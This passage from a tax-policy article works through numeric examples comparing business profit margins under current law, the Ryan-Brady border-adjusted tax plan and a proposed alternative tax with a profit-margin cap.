import profit (import costs go down to $57.14 and 84 cents at 19 percent appreciation) Assuming no decrease in import costs Current law 10.4% Ryan-Brady 1.8% Alternative tax 10.1% Assuming 19 percent appreciation Ryan-Brady 10.6% Example 6: Medium profit margin (9.9 percent), low import cost (26.4 percent) business $125 U.S. receipts, $77 U.S. costs, $28 real import costs, $1 related-party import profit (import costs go down to $25 and 89 cents at 12 percent appreciation) Assuming no decrease in import costs Current law 9.9% Ryan-Brady 7.5% Alternative tax 9.6% Assuming 12 percent appreciation Ryan-Brady 10.0% Example 7: Low profit margin (3.6 percent), high import cost (95.8 percent) business $125 U.S. receipts, $4 U.S. costs, $113 real import costs, $1 related-party import profit (import costs go down to $91.13 and 81 cents at 24 percent appreciation) Assuming no decrease in import costs Current law 3.6% Ryan-Brady -13.8% Alternative tax 3.4% Assuming 24 percent appreciation Ryan-Brady 3.9% Example 8: Low profit margin (4.7 percent), medium import cost (62.1 percent) business $125 U.S. receipts, $43 U.S. costs, $72 real import costs, $1 related-party import profit (import costs go down to $58.54 and 81 cents at 23 percent appreciation) Assuming no decrease in import costs Current law 4.7% Ryan-Brady -5.9% Alternative tax 4.4% Assuming 23 percent appreciation Ryan-Brady 5.0% Example 9: Low profit margin (4.7 percent), low import cost (25.9 percent) business $125 U.S. receipts, $85 U.S. costs, $30 real import costs, $1 related-party import profit (import costs go down to $25.21 and 84 cents at 19 percent appreciation) Assuming no decrease in import costs Current law 4.7% Ryan-Brady 0.8% Alternative tax 4.4% Assuming 19 percent appreciation Ryan-Brady 4.8% ______________________________________________________________________________ * The profit margin cap is necessary because as import costs go down, the alternative tax calculation could result in a higher after-tax U.S. operating profit margin (profit margin) than the Ryan-Brady plan. The cap increases the business's tax bill (but not its profit margin) to ensure that the only way such cost reductions will give the business a better profit margin is when the business can achieve it by way of the Ryan-Brady plan. In Example 1 above, the business will not have a profit margin of 23.1 percent assuming 8 percent appreciation but will have to pay extra tax so that it will only have a profit margin of 20.3 percent. The calculations for Example 1 are below. Note that we assumed only a small amount ($1) of related-party import profit in all of the examples. Businesses will get worse answers from the alternative tax if they have larger amounts of this type of import cost as it can be inflated to avoid tax under current law: Current-law profit margin = $125 receipts - $5 U.S. costs - $80 real import costs - $1 related-party import profit = $39 tax base x 35 percent tax rate = $13.65 tax; $39 pretax profit - $13.65 tax = $25.35 after-tax profit; and $25.35 after-tax profit / $125 receipts = 20.3 percent profit margin. Ryan-Brady profit margin = $125 receipts - $5 U.S. costs = $120 tax base x 20 percent tax rate = $24 tax; $125 receipts - $5 U.S. costs - $80 real import costs - $1 related-party import profit = $39 pretax profit; $39 pretax profit - $24 tax = $15 after-tax profits; and $15 after-tax profits / $125 receipts = 12 percent profit margin. Alternative tax profit margin = $125 receipts - $5 U.S. costs - $80 real import costs = $40 tax base x 35 percent = $14 tax; $39 pretax profit - $14 tax = $25 after-tax profit; and $25 after-tax profit / $125 receipts = 20 percent profit margin. To calculate how much tax is owed when the cap is triggered (when there has only been 8 percent appreciation, for example), start with current- law profit margin. On $125 of receipts, a 20.3 percent profit margin means having an after-tax profit of $25.35. For the tax due, subtract $25.35 from the pretax profit at 8 percent appreciation ($125 receipts - $5 U.S. costs - $74.07 real import costs - 93 cents related-party import profit = $45 pretax profit; and $45 pretax profit - $25.35 = $19.65 tax due). Note that whether a business has receipts from exports is irrelevant, because under the Ryan-Brady base, receipts from non-U.S. consumption aren't taxed. These examples do not show the benefits of using a Ryan-Brady base, including any benefit from immediate expensing. However, if a business using the alternative tax calculation benefits from that, the benefit will always be capped if it results in a higher profit margin than its historic average until it moves to being taxed under Ryan-Brady. FOOTNOTE 1 The optimistic views and simplistic thinking in this article are their own. END OF FOOTNOTE
http://www.taxanalysts.org/content/slightly-better-better-way-plan
CC-MAIN-2017-26
refinedweb
3,538
55.34
I2C Bus Error Hello, I have consistently been having the OSError: I2C bus error and have yet to find a fix that works. There are a few topics already where people have just updated their pytrack firmware/LoPy firmware to fix the problem. I am on the most recent versions of both of these and still no fix. The traceback OSError: I2C bus error. Line 115 is: self.i2c.writeto(I2C_SLAVE_ADDR, data) Also Getting it File "pycoproc.py", line 129, in _wait OSError: I2C bus error. Line 117 is: self._wait() Does anyone have any ideas on what could be going wrong? Sometimes the module can be running for a few hours before it gets an error, sometimes it happens several times in a row. Cheers, Dylan @livius Thanks, that is now working. I am getting [] while everything is working, and it seems to say "None" just before a "Board not detected" error. No change on anything when receiving an I2C bus error message. @ledbelly2142 what do you mean by checking the pins? I've gone as far as removing the LoPy from the Pytrack and having a look haha, but it looks like normal pins to me. Hope everyone had a good Christmas and New Years @dylan said in I2C Bus Error: Yup, I just tried is again but with capitals, I2C.scan(), got "TypeError: function takes 1 positional arguments but 0 were given" because you use class not object (1 argument is needed self- object itself) You must create I2C object first to use it. from machine import I2C my_obj = I2C(0, I2C.MASTER, baudrate=100000) #here you create object `my_obj` of class type `I2C` and then you can use it devices = my_obj.scan() #here you got list of devices addresses print(devices) I'm also still consistently getting the "Exception: Board not detected". Thought I'd just post here rather than make another topic. I have re-installed pytrack 0.0.8 twice now, the message in command prompt and all along the way suggests that everything worked perfectly, also updated to the 1.10.2.b1 firmware for LoPy.. I'm using the most recent pycoproc.py/pytrack.py files. My fix has been a terrible one, I just put in machine.reset() before the "Raise Exception('Board not detected')" line, it works but it certainly isn't a great solution. Last night my device ran for 4 hours before stopping which was great, but I'm going to be needing weeks to months at a time. I'm so close to being able to send my device out in the field :D. @ledbelly2142 Not sure on the battery voltage pins, but that's what I've been looking at since your last reply, so far this is what I've been looking at: def read_battery_voltage(self): self.set_bits_in_memory(ADCON0_ADDR, _ADCON0_GO_nDONE_MASK) time.sleep_us(50) while self.peek_memory(ADCON0_ADDR) & _ADCON0_GO_nDONE_MASK: time.sleep_us(100) adc_val = (self.peek_memory(ADRESH_ADDR) << 2) + (self.peek_memory(ADRESL_ADDR) >> 6) return (((adc_val * 3.3 * 280) / 1023) / 180) + 0.01 # add 10mV to compensate for the drop in the FET def set_bits_in_memory(self, addr, bits): self.magic_write_read(addr, _or=bits) def peek_memory(self, addr): self._write(bytes([CMD_PEEK, addr & 0xFF, (addr >> 8) & 0xFF])) return self._read(1)[0] _ADCON0_GO_nDONE_MASK = const(0x02) ADCON0_ADDR = const(0x9D) ADRESL_ADDR = const(0x09B) ADRESH_ADDR = const(0x09C) Really not sure what the 0x9D parts are meaning, can't see anything else that might be related to what pins the voltage is using. @dylan I don't know if you can move the I2C pins, I moved mine on the breakout board (not the Pysense) with the deep sleep shield. Not sure what pins the pytrack is using for i2c, looks like G8 (P21) SCL and G9 (P22) SDA, but seems like they should not be on the same pin as the voltage reading. What pin are you using to read the battery voltage? I don't know how it works with the Pysense board. I'm getting coordinates and a battery voltage reading to be sent at the same time to the TTN etc. I was thinking that maybe they are both using the same pins and that's how sometimes they throw each other out, the error is always for the battery voltage from memory, the voltage reading is taken first in the coding. @ledbelly2142 Yup, I just tried is again but with capitals, I2C.scan(), got "TypeError: function takes 1 positional arguments but 0 were given" That sounds like it will give me a good start cheers. I put in a line i2c.scan() just before error message so it would come up when there has been an error, but its come back saying "AttributeError: NoneType object has no attribute 'scan' ". How should I be putting in the i2c.scan() to be getting it to work? When I have received this error in the past, it was due to having the wrong i2c address for the device. This may not be your issue, but you can rule it out and check the deive address with i2c.scan() If you don't get anything back, check the pins your I2C connection. I apologize if you already tried this, just a simple thing to check and rule out if you haven't already.
https://forum.pycom.io/topic/2314/i2c-bus-error
CC-MAIN-2018-17
refinedweb
880
74.08
45. Re: Show Off Your Buildbenheck Mar 14, 2012 11:11 AM (in response to aouate3) Thanks for sharing your projects! 46. Re: Show Off Your BuildStevhip Mar 20, 2012 12:35 PM (in response to Christy-Admin) Trying desperately to reach Ben Heck. My name is Steven McMahon and I registered for this site so that I could send you a message. I came up with the idea for autonomous luggage some time ago and I'm not looking for any credit or anything for it. I actually sent the idea in to Apple Computer and Steve Wozniak and have the emails still in my sent folder from last year, and will be happy to share them with you. I am disabled with 8 herniated discs and migraine headaches and other issues which I prefer not to discuss here. My idea differs from yours a bit. I wanted a seat that one could flip out on the top and ipad-type batteries or maybe laptop batteries inside. I thought that iPad batteries would be thin, light and powerful. I also wanted to incorporate plugs and USB for charging one's devices while waiting for their plane. So someone traveling through an airport would have their own seat, their own plugs and when they got to their destination or an available outlet, they could plug in their luggage to recharge it. I thought it would be important for a commercial product to have enough power to recharge peoples' iPads, tablets, iPhones, etc. And I also thought that a solar panel would be a great thing to sell as an accessory to recharge when in between trips. I noticed you are giving this one away. I've sent you a message on the comments thread for the video on element's site last night, but I don't know if you received it. I've been disabled for several years, but I had a union job in health care as an admin before that so I have a pension. I know you are really smart and stuff, but this is my dream idea, and your incorporation of this is as close to my original idea as I'm ever going to see. If there is any way I could get you to create one for me, I would be grateful forever. I will pay for it. I have a pension and this is extremely important to me. I can prove this is my idea. Every neighbor of mine and friend knows about it and I have the emails I sent Apple and Woz. I never thought I would gain anything from it, but I did think it was a genius idea and you having come up with the same idea proves that indeed it was a great idea. Having a working autonomous luggage for me would be a miracle and a dream come true. I am willing to pay for it, please just consider my request. Of course, in the back of my mind I thought it would have been wonderful if Woz or Apple had written back and decided to run with this idea, creating the iLuggage (or the Griffin as I had named it after my cat), and made a really polished, mass produced luggage that was as recognizable as the iPhone. But I'm still very stoked that you have created a working version of my idea and come up with the idea yourself. A few differences between ours: My idea (and I am a layperson who has no clue how to do more than use a screwdriver) was to have 4 wheels on the bottom which would work like a remote control car or a roomba/scooba except faster. The chair being built into the luggage isn't a neccessity but I thought it was a great thing to have for something that would basically make the luggage alllow it's owner to not need a seat nor an outlet. And of course built in outlets and USB ports for charging devices from the batteries on board. Also, better battery tech and power. I realize you've created a luggage that is a proof of concept, but I thought that if a company were to sell a product for say $250, they would want to include all of these features. I thought that bluetooth would be how the device followed a person around so that one could download an app to their phone and the luggage would follow them that way. Once again, I have no idea how to put anything from idea to reality. But I did come up with this idea and it would be the most exciting thing that's happened to me in years to have a working model and show people that something I thought of actually works in practice. Another potential idea would be to create one using an iPad dock integrated somehow which would allow for the battery and the camera of the iPad to be used in the operation of the luggage, pulled out when one reaches TSA checkpoint. It seems to me that if the battery were part of the iPad and popped out when the iPad were removed, one would have a luggage that passed through TSA without an issue, especially if there were an app that used the camera function to follow some special marker one would wear on their back pocket. I know you don't know me and have no reason to help me. I'm willing to pay whatever you want for a working iLuggage to have, even if I'm not allowed to use it for my trips. I travel bi monthly on an airplane for medical treatment related to my back and neck injuries. stevemcmahon40@gmail.com is my email and I'm very excited to see this and very very hopeful that you might consider making one for me. I don't have much money but I will come up with whatever you charge me for it because really, to see one of my ideas turned into a real product proves to me that I have valid ideas, even if I don't have the knowledge required to make them into reality. Regardless of what you decide Mr. Heck, I do thank you for making this luggage and I'm very very happy to see that even though it's not exactly what I thought of, it's pretty close. Best Regards, Steven McMahon 47. Re: Show Off Your BuildWeeBo Apr 1, 2012 6:25 PM (in response to Christy-Admin) This is a quick project I built in about 4 days, from idea (concept) coming to mind, to a working product..well product might far fetched I purchased an older (1985 from the service check tag) Bell payphone for $20 at an auction. I had it sitting around for a while before I looked at it, I wanted to do something with it, I just didn't know what. Since I don't have a landline in my apartment, as I use my cell as a primary line, the ideas narrowed down. I thought, HEY!!, Wireless payphone. I decided to use an older style cellphone, to connect to the payphone as it would be a lot easier. The pay/cellphone is a one a cheap secondary account and is now used as the door buzzer to my apartment. So when someone calls from downstairs the payphone rings and I buzz them in. If someone comes over and they need to use the phone, I point them in the right direction. Video is a bit weird since the PIP was recorded at a different time, since you really couldn't see the lcd in full view. (didn't proof read, if typos found, please ignore ) 48. Re: Show Off Your Buildwatermoccasin Apr 4, 2012 3:15 PM (in response to Christy-Admin) 49. Re: Show Off Your Buildocaron May 6, 2012 5:46 AM (in response to Christy-Admin) A small challange for you, How can I add a laptop lid switch and associated power options to a tower pc, (it must be a toggle switch) so that i can set it to turn off the monitor or go into standby when the switch isnt held i,e, a dead mans switch 50. Re: Show Off Your BuildWeeBo May 6, 2012 7:35 AM (in response to ocaron) Actually this would be pretty simple to do, in principle. All you would really need is a momentary switch, or even a microswitch wired with NC. I would jack that into the Power/Reset pin on the computer mobo (follow the pinout, should be labeled). In windows choose an action you would like windows to perform when the power button is "pressed" (since it's NC it will "press" on open). Than stick it on your chair, so when you sit down it powers on, and when you stand up it goes off, not a bad idea. The wiring might be backwards, but the idea is there. 51. Re: Show Off Your Buildocaron May 6, 2012 3:39 PM (in response to WeeBo) Thanks but if i wire it to the power switch then when i stand up it will turn the computer off after 5 secounds regardless of the settings, unless you know how to turn that off but i think its a hardwired function 52. Re: Show Off Your Buildshnak May 11, 2012 3:48 PM (in response to Christy-Admin) 53. Re: Show Off Your Builddakota.gamer.dreamer Jul 31, 2012 12:16 AM (in response to Christy-Admin) Dear Ben Heck, I have had the idea of building a 360 laptop but I do not have the tool nor the money to buy them. I am not very electronically inclined but I have built a computer tower when I was twelve with the help of my great uncles. I was wondering if you could build me a 360 laptop with hdmi. how much would it cost to make? i would apreciate your opinion. Thank you. Dakota 54. Re: Show Off Your Buildnonme85851 Aug 12, 2012 10:55 PM (in response to Christy-Admin) Hi, Ben! I know you are great at making projects for laziness, and I have a challenge for you! Have you ever noticed that the boom of your headset gets in the way? You should create some sort of project to solve this issue, like when it detects something in front of the mic, it automatically raises it so you can take a bite of your food! 55. Re: Show Off Your BuildJon_McPhalen Aug 25, 2012 10:35 PM (in response to Christy-Admin) I wonder how the wheelchair update is comping along. It seemed odd to me that the motors were so noisy -- like the PWM frequency was out of whack. I design circuits and code (for the Parallax Propeller chip) for a friend who makes pan/tilt controllers. One of the things I do on start-up is read the raw values from the X and Y sticks and call these the "idle" position. The deadband is surrounds that. What this can lead to, especially with low-cost joysticks is an offset idle value (i.e., not in the center of the pot range). What I do then is re-scale the new values on either side of the pot with a simple method (for those that have never seen Spin, the operators for less-than-or-equal and greater-than-or-equal are different from what you're used to). pub scale(raw, range, minout, maxout) '' Scales raw (0 to range) value to new range: minout to maxout if (raw =< 0) return minout elseif (raw => range) return maxout else return ((raw * (maxout - minout)) / range) + minout This is just a simple mx+b thing but helps take care of all the oddites of inexpensive joysticks and the use of a deadband. That was a nice thing to do for that couple. If they have boy, will they name him Ben? 56. Re: Show Off Your BuildFidelGVelasquez Sep 13, 2012 12:11 PM (in response to Christy-Admin) I don't know much about internet forum etiquette, so I'll just describe my challenge: I challenge Ben Heck to mount solar panels on a backpack, have them charge a rechargeable battery (or battery pack), and subsequently have the battery be used to power a small, low power-consumption Linux PC (such as the Raspberry Pi), with the option to switch to powering a USB hub (for charging other devices). The backpack would need to be relatively small (for easy mobility) and not too heavy (less than 15 pounds would probably be good). If possible, he could add a screen and keyboard (and speakers?) in one of the larger pockets. I am currently 14, and I'm going to be moving to a place with a lot or sunlight, but not as much in the way of electrical outlets, and it would be nice if I could continue my random computing projects and such. If Ben ever reads this, just private-message me through Element14. I'll be posting this as both a discussion and a reply to "Show Off Your Build." 57. Re: Show Off Your Buildbenheck Sep 25, 2012 4:10 PM (in response to nonme85851) That's a cool idea Kevin! There's actually an upcoming episode along those lines, but the headset one might be good for the future too. Cheese dip on your mic for the last time! Jon, yes the issue was we used the Arduino PWM giving us a pulse in the audible range. Something like the Propeller frequency counters would be awesome. Don't worry, I haven't forgotten the Prop! (or the Prop 2, should it ever arrive!) 58. Re: Show Off Your BuildJonnyEnglish Oct 28, 2012 7:42 AM (in response to Christy-Admin) Halloween Costume- Insanely Geeky!! Mr Arcade Halloween Costume on youtube!! I made it! Full description is in the video description on Youtube including a quick video of how I made it!! Could you make it with a Rasberry Pi and make it better, cheaper and lighter? (Like a repeat episode of the improving the portable Atari!!) Let me know ... time is short until Halloween!! Happy Halloween! >>>>>>>>> 59. Re: Show Off Your Buildisthisthingon Nov 17, 2012 7:23 PM (in response to Christy-Admin) Hello, since I know nothing about internet manners, I'll get straight to the point. Would it be possible for you to do something along the lines of Yoshi's Boxx? Yoshi's Boxx was a ATX computer case with a GameCube, PS2, XBox, and Gaming PC in it. Could it be possible to do this with modern consoles? I know it would require quite a bit of cooling, but I think it might be possible. Sincerly, TheYoungHag
http://www.element14.com/community/message/48821
CC-MAIN-2015-18
refinedweb
2,490
75.44
theshashiverma Joined Activity I am creating an admin template, and there is a customizer section in which I have created 3 radio buttons (named: Red, Blue, Green). There is a left sidebar navigation menu and I want to change the background color of sidebar navigation menu by clicking on the radio buttons. If I am clicking on the button it is changing the bg-color of sidebar navigation menu by adding a class, but if I am going to another page gets reloaded and the class gets removed. I have tried one thing, in my application_helper.rb I have added the following code def is_active(action) @color = "red" params[:action] == action_name ? @color : nil end and in my layouts folder, I have a partial file _sidebar.html.erb and at the outer div I am using this helper like below <div class="sidebar-nav <%= is_active('action_name') %>" id="collapse-sidebar" > What I am doing here is, checking the action name if it is matching then adding a class red which is stored in an instance variable @color If I can pass the value of the radio button to the application_helper file dynamically means if I click on red the value should be red, green then the value should be green. and by which I can change the class name dynamically in application helper and further that would change the color of the sidebar. Please, If I am doing anything wrong or it's is not the right way to do this or we can't achieve this kind of functionality in ruby on rails, please acknowledge me, that would be appreciable. On stackoverflow: Thank you I am getting this "Rails ExecJS::ProgramError in Pages#home" error in browser, when i go to the root path which is pages#home. I am using windows 10. untill i dont add the bootstrap it works fine but after adding bootstrap and jquery i get this error . I follow this article to add bootstrap in my project AND WHY I AM GETTING THIS ERROR ? WHILE USING UBUNTU I DID NOT FACE THAT BUT WHY IN WINDOWS(10)? I Thank you for the reply sir, yes, I am using 5.2 and you have tell me the new way to keep the secrets and id of providers, I will try to attempt like this. but, now what i did, I kept the id and secret in devise.rb file and that was also working fine, and now I am suffering from another issue that is how to add multiple provider . can you please check this out and I have one more thing to ask : few days ago I read an article on internet that in upcoming rails6 we are going to use some kind of webpack or webpacker and then we dont need to use the coffeescript in our project or may be it would not be compulsory to use the coffeescript anymore. and it will be fine if we use js. Is it right ? because in project i have used almost coffeescript. Thank you so much. @ChrisOliver Thank you sir for the reply, one more thing to ask,when i am using omniauth+devise, is it necessary to keep the client id and secret in the .env(environment variable) file because for that i have to install a dotenv gem and then to run the project i have to run "dotenv rails server" command. Can I keep the id and secret in omniauth.rb file which is customly created by in the initializer folder? I want to add social authentication in my project like user can also login with Facebook, Github, and Google. I have already added the simple authentication with the devise gem. And now I want to add the social authentication also. I found many articles on the Internet and I majorly found two way to do that devise + omniauth omniauth So, can anyone suggest me what is the best way to have social authentication This is the article of omniauth And this one is of devise+omniauth that I followed. Thank You.. I?
https://gorails.com/users/18729
CC-MAIN-2021-17
refinedweb
680
66.88
Java package Examples Java Util Package - Utility Package of Java Java Util Package - Utility Package of Java Java Utility package is one of the most commonly used packages in the java program. The Utility Package of Java consist java util date - Time Zone throwing illegal argument exception java util date - Time Zone throwing illegal argument exception Sample Code String timestamp1 = "Wed Mar 02 00:00:54 PST 2011"; Date d = new Date...()); The date object is not getting created for IST time zone. Java Associate Java - Java Interview Questions :// Thank you for posting Create Web Page with jsp ; In this example we will show you how to create first web page on tomcat server. JSP simply application that work with Java inside HTML pages. Now we..." instead of "Date.html". This one the simply exercise for - Java Interview Questions more information to visit....... an explanation with simple real time example Hi friend, Some points Hello World code example Java Hello World code example Hi, Here is my code of Hello World program in Java: public class HelloWorld { public static void main..."); } } Thanks Deepak Kumar Hi, Learn Java Java bigdecimal plus method example Java bigdecimal plus method example Example below demonstrates working of bigdecimal class... or simply + this.object. Method throws NumberFormatException if it finds value Example of contains method of hashset in java. Example of contains method of hashset in java. The contains() is a method of hashset. It is used for checking that the given number is available..., it returns true otherwise false. Code: HashSetToArray .java:  Data Structures in Java Data Structures in Java In this Section, you will learn the data structure of java.util package with example code. Java util package(java.util) provide us... Hashtable Properties After the release of Collections in Java 2 Word Count - Word Count Example in Java Java Word Count - Word Count Example in Java This example illustrates how... of words and lines present in the file. Parameter is optional and if you simply Java Locale :/ http:/  ... Java Locale
http://www.roseindia.net/tutorialhelp/comment/81163
CC-MAIN-2015-06
refinedweb
337
56.25
This document is a gentle introduction to PBS . It gives you some insight in why we designed it the way we did. PBS is a build utility in the same spirit as make. It is not compatible with make and works completely differently! PBS history starts with the complete frustration state we got in when trying to have gmake do anything complicated. To fix that problem, we introduced cons at our job and it worked fine but I was not completely happy with cons as were other people on the cons mailing list. During Chrismas break, I always try to start a new project. The month was december, my frustration with make was at its top, Chrismas was one week away, PBS was born! After a week work I had a small working build system. At that time I had contact with Michel Pfeiffer who was working on, the now defunct, make.pl. Our goals where to write an advanced build system under 10 KB code (I can only smile when I see PBS is closer to 400 than 10 KB). From make.pl home page: Arcane make and its various derivatives (cook, GNU make, jam, makepp, ...) use a weird language mix of a variable and rule syntax plus, for actually doing something, embedded shell (along with sed, awk ...) The derivatives improve this language, but the improvements are not accessible with automake, and still don't make a really useable language. Having a powerfull scripting language instead for a crippled one makes a huge difference for a build system maintainer. To the arcane make, I would add the ugly, unreadable XML based build systems. I also wanted to try new ideas that haven't been used in other build systems. META is a very overloaded word that computer engineers use when they want to make something sound more intelligent than it really is. PBS is not a build system, it's a library that makes it possible to write a build tool and eventually an instanciation of it, ie a build system. Work must be invested in a build system, or more rightly in "the" build system you are using. This is true whatever tool you are using. We have such a tool, pbs. Note the lower case name. PBS give you the possibility to do things, it's up to you to do them. If you are looking for some magical build system, there are a few out there that might do that for you. If you write build systems when you have free time or really, really when you need to do it, then PBS is not for you. PBS is a three pass system, it build a dependency graph, checks the dependency graph to find out what is to be build, builds whatever node that needs it. This is very different from make which builds on the run. Both systems have advantages and disadvantages. PBS lets you define rule in scripts written in perl. Using filters you could write them in whatever language you want. Once the rules are defined, PBS generates the dependency graph by applying the rules recursively on the top tager and it's dependencies. Having the whole dependency graph has these advantages: It also has the following disadvantages: To overcome the first disadvantage, PBS uses caching scheme we call warp. PBS is a superset of Perl or an add-in to Perl (choose whichever you prefer). It introduces only a very few extra functions. Those functions are nothing more than plain Perl subs. The build scripts being perl, they are interpreted by perl within the frame of PBS. I, Nadim Khemir, wrote PBS but the credit is not only mine. Anders Lindgren has been involved from the very begining with the architecture and he is also the one that can use PBS best. Ola Maartensson also deserves large credit for forcing us not to fix something for our needs but think about other users (mainly him :-). He set his mark in how things should look like and how verbose a build system should be. Ola and I maintained the build system at our work. It was based on make and that's why we tried to have it look a bit the same. Here is a simple rule: AddRule 's_objects' #name => [ '*/*.o' => '*.s' ] #depender => "%AS %ASFLAGS ... -o %FILE_TO_BUILD %DEPENDENCY_LIST" ; # builder The rule could be defined in a rule library and that library could be included instead for definig the rule inline. This is exactely what we do in a file we call (wrongly as the rule above is for assembler files) C.pm. PBS has support for finding libraries and locally overidding libraries. The above (and much more) is replaced in our Pbsfiles by this single line: PbsUse('Rules/C') ; We try to mimic Perl's use and we give our libraries the extension .pm. Pbsfiles should have extention .pl. PBS will automatically push your script in a package. This is done to separate rules and configurations when doing a hierarchical build. all Pbsfiles run in strict mode. Pbsfiles are perl scripts so all you can do in a perl scrip you can do in a Pbsfile, including using modules from CPAN. You can add rules but you can also remove rules from the rules defined in the libraries you include. PBS doesn't do much and does nothing by default. I don't like to guess what is going on so I find it empowering to have to tell the system what to do. Since PBS is a meta build system, you can write your own interface that makes it look easy or or use the less easy but straight forward native interface. PBS has no built-in rules, period. Rules have 6 components, 2 are mandatory. A rule always has a name (mandatory). This is to simplify debugging (of _your_ build system). A rule also bellongs to a rule namespace. More often than not, PBS handles this transparently and you don't even know it is there. A rule can carry a node type, ie when a node matches a rule, the rule type are passed to the node. To know if a rule matches a node, a (mandatory) depender is declared. Most often the depender is a list containing a regex and a dependency definition. A depender can also be a perl sub so it can get very powerfull and complicated, one such depender is the example C depender that comes with pbs. PBS also needs to know how to build nodes. This is either done with a list of shell commands or, again, by using perl subs. Finally (since version 0.28_3) PBS accepts what we call "node subs". Node subs are run when a node is added to the graph. These subs can do a wide range of operations that are described in the reference manual. you can also define you own "node subs". All these elements are described in detail in the reference manual. A meta rule is a rule made of multiple rules with some glue to say which of the base rules does match. An example is: From which source code you build an object file when you hace a C file and and assembler file ? You have three rules, one to build from a C file, one to build from an assembler file and one to arbitrate between the rules. Dependers are perl subs, you can also define a sub that return a depender sub. These subs are run in order and the sum of the dependencies becomes the node under work dependencies. Note that this is different from make. A builder is also a perl sub. To simplify things, for the user anyhow, AddRule also accepts a list of shell commands. PBS uses the builder from the last matching rule. It will also tell you (if you ask) if nodes had other builders. PBS lets you define and query configuration variables. These are perl variables so they can contain live objects like mailer or anything you fancy. PBS will check if you try to override a configuration variable and show you what your variables contain if you ask. PBS never changes directory and you should never change directory in a depender or a builder. Everything is based in '.', the current directory. The check step locates the files based in '.' and set their full path build names. if you don't give a specific build directory to PBS, it will build int "out_" + your user name. So you never clutter your source directory unless you really want to. PBS can locate your source files from multiple directories, these are also sometime named "repositories" in other build systems. Your repositories can also contain binary files. PBS supports hirarchical builds, No extra process is started for a sub build (called sub pbs). This is a necessity as we must have the full dependency graph. Unlike cons, top build files and lower level build files are equivalent. This lets you use PBS for building projects or their sub components without the same set of Pbsfiles There are two ways to start a sub pbs, by directly matching a rule that starts a subpbs or by defining a trigger. A trigger will start a sub pbs when a node "triggers" a rule (this is much easier to comprehend with an example). The nice thing is that triggers can be defined in the sub Pbsfile and imported from there. This allows for a better separation of the rules making up your build system. The user's manual has such an example. Pbsfiles can be commented with POD and PBS can extract the documentation and even search it for you. PBS has debugging hooks that let you run speciific perl code on certain events. The support works in the perl debugger too. (hmm what about latest perl version?) Khemir Nadim ibn Hamouda. <nadim@khemir.net>and Ander Lindgren (ALI). Thanks to Ola Maartensson for his input. Parts of the development was funded by C-Technologies AB, Ideon Research Center, Lund, Sweden. Artistic License 2.0
http://search.cpan.org/dist/PerlBuildSystem/doc/PBS_short_introduction.pod
CC-MAIN-2016-50
refinedweb
1,685
73.78
Introduction One big framework's handicap is the low number of visual controls. Luckily the most useful are yet present, but often we find some problem with the less common control. Some days ago I developed a program that translate the colors in the HTML code. In the beginning, I used simply three trackbar to change the red, green and blue. In a second moment I need to put a more quick and intuitive solution, so I build this ColorPicker. This control allow to select a color faster than the previous one. Because I haven't seen a similar control in this section, I decide to post it.In the last update I added a consistent number of controls. All controls are listed below: ColorViewers (namespace Fuliggine.ColorPickers) Special Pointers (namespace Fuliggine.ColorPickers) The ColorPickers Controls The most part of these controls don't need any word, almost I think. For CodeBar and full code bar I divided the width in some section to allow all the possible combination of R,G,B. After that I found the step of color done in every pixel and draw the control line by line... protected override void OnPaint(PaintEventArgs e) { int R=255; int G=0; int B=0; //orizzontal... int colorstep=255/ ( this.Width/6 ); int i=0; //the color step x pixel for(B=0;B<256;B+=colorstep ,i++) e.Graphics.DrawLine(new Pen(new SolidBrush(Color.FromArgb(R,G,B)),1),i,0,i,this.Height); } B=255; for(R=255;R>0;R-=colorstep,i++) { R=0; for(G=0;G<256;G+=colorstep,i++) G=255; for(B=255;B>0;B-=colorstep,i++) { B=0; for(R=0;R<256;R+=colorstep,i++) e.Graphics.DrawLine(new Pen(new SolidBrush(Color.FromArgb(R,G,B)),1),i,0,i,this.Height); R=255; for(G=255;G>0;G-=colorstep,i++) } A similar way is used also in the Color Gradient and SquareColorPicker, but there only the tones of the color are shown. int ScaleY=255/this.Height; for ( int y = 0 ; y<this.Height;y++) { int r=pColor.R-(y*ScaleY); if(r<0) { r=0; } int g=pColor.G-(y*ScaleY); if(g<0) { g=0; } int b=pColor.B-(y*ScaleY); if(b<0) b=0; e.Graphics.DrawLine(new Pen(new SolidBrush(Color.FromArgb(r,g,b)),1),0,y,this.Width,y); The Mono and Double Fame Color are realized by simple panels. The Hole pointer is a simple control that bring itself in the apparent bounds when the mouse drag it. Basing on its position controls it is decided what's the selected color. The Color Picker Application The demo is that I find a nice application, nice and simple but useful for who always use the HTML language. This application show a way to use the StableColorPicker. How to know the RGB color I have decided to do a round rainbow. The main problem is that in a RGB system we have 3 variables and in the plain there are only two. So I decide to take the X value as Red, Y value as Green and the distance from center as Blue. The circle is inscribed in a square of 255 pixel for each side. The distance from the center is calculated with the Pitagora's Theorema and resized to fit in the range 0-255. So at every point is associated with one value between 0 and 255. How to paint the circle To paint the circle, I have two ways: the first one is to paint all the point on the ray for each angle; the second one is to paint every point in a circle each circle. This two different way can be selected by the user .This piece of code is shown here: //set some usefull var int offsett= 1; int width=this.ClientRectangle.Width-2; int height=this.ClientRectangle.Height-2; int rx= width/2; int x=10; int y=10; int cx=offsett+rx; double teta=0 ; //refresh the background e .Graphics.FillRectangle(new SolidBrush(this.BackColor),this.ClientRectangle); //The core of painting if ( AnimationRadial==true)); } else for ( double ray = 0 ; ray<rx ;ray= ray+1) for ( teta = 0 ; teta <2*Math.PI; teta=teta + 0.003) {); How to select a color To select a color I made a special class that can be moved by the user. Every Color Picker has one of this and the control return the color under it. Problems A big problem is the flickering repainting. I resolve taking the screenshot of this control, and putting it on a new control derived from paintbox. This isn't an elegant solution but works...I call this new control StableColorPicker. Classes In this release we have the first version of the control (ColorPicker) which works fine, but isn't very stable, than the second stable version(StableColorPicker). Credits If you would see my other work please visit my home page: Fuliggine ColorPickers Image Resizing : Part II
http://www.c-sharpcorner.com/UploadFile/zeppaman/FuliggineColorPickers05102006045402AM/FuliggineColorPickers.aspx
crawl-003
refinedweb
838
58.38
